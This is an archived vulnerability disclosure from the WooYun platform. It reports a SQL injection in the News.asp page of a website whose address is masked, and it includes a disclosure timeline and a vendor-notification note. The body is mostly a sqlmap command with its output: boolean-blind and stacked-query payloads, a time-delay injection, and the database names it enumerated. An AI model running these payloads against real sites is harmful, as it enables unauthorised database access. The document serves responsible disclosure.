乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-11: 细节已通知厂商并且等待厂商处理中 2015-11-20: 厂商已经确认,细节仅向厂商公开 2015-11-30: 细节向核心白帽子及相关领域专家公开 2015-12-10: 细节向普通白帽子公开 2015-12-20: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
RT
sqlmap -u "http://**.**.**.**/DP/Sin/News.asp" --data "B1=%EF%BF%BDe%EF%BF%BDX&mm1=11&dd1=04&yy2=2015&mm2=11&dd2=09&yy1=2015" --dbs
Parameter: dd2 (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: B1=%EF%BF%BDe%EF%BF%BDX&mm1=11&dd1=04&yy2=2015&mm2=11&dd2=09' AND 6128=6128 AND 'mxVw'='mxVw&yy1=2015Parameter: dd1 (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: B1=%EF%BF%BDe%EF%BF%BDX&mm1=11&dd1=04' AND 5334=5334 AND 'DTCl'='DTCl&yy2=2015&mm2=11&dd2=09&yy1=2015 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: B1=%EF%BF%BDe%EF%BF%BDX&mm1=11&dd1=04';WAITFOR DELAY '0:0:5'--&yy2=2015&mm2=11&dd2=09&yy1=2015---there were multiple injection points, please select the one to use for following injections:[0] place: POST, parameter: dd1, type: Single quoted string (default)[1] place: POST, parameter: dd2, type: Single quoted string[q] Quit> [18:29:04] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000[18:29:04] [INFO] fetching database names[18:29:04] [INFO] fetching number of databases[18:29:04] [INFO] resumed: 8[18:29:04] [INFO] resumed: Berich[18:29:04] [INFO] resumed: Berich_GL[18:29:04] [INFO] resumed: master[18:29:04] [INFO] resumed: model[18:29:04] [INFO] resumed: msdb[18:29:04] [INFO] resumed: Northwind[18:29:04] [INFO] resumed: pubs[18:29:04] [INFO] resumed: tempdbavailable databases [8]:[*] Berich[*] Berich_GL[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb[18:29:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/**.**.**.**'[*] shutting down at 18:29:04
危害等级:高
漏洞Rank:15
确认时间:2015-11-20 06:30
感謝通報
2016-01-07:HITCON 於接獲通報後多次 email 該網站所示之服務信箱,至今尚無回應。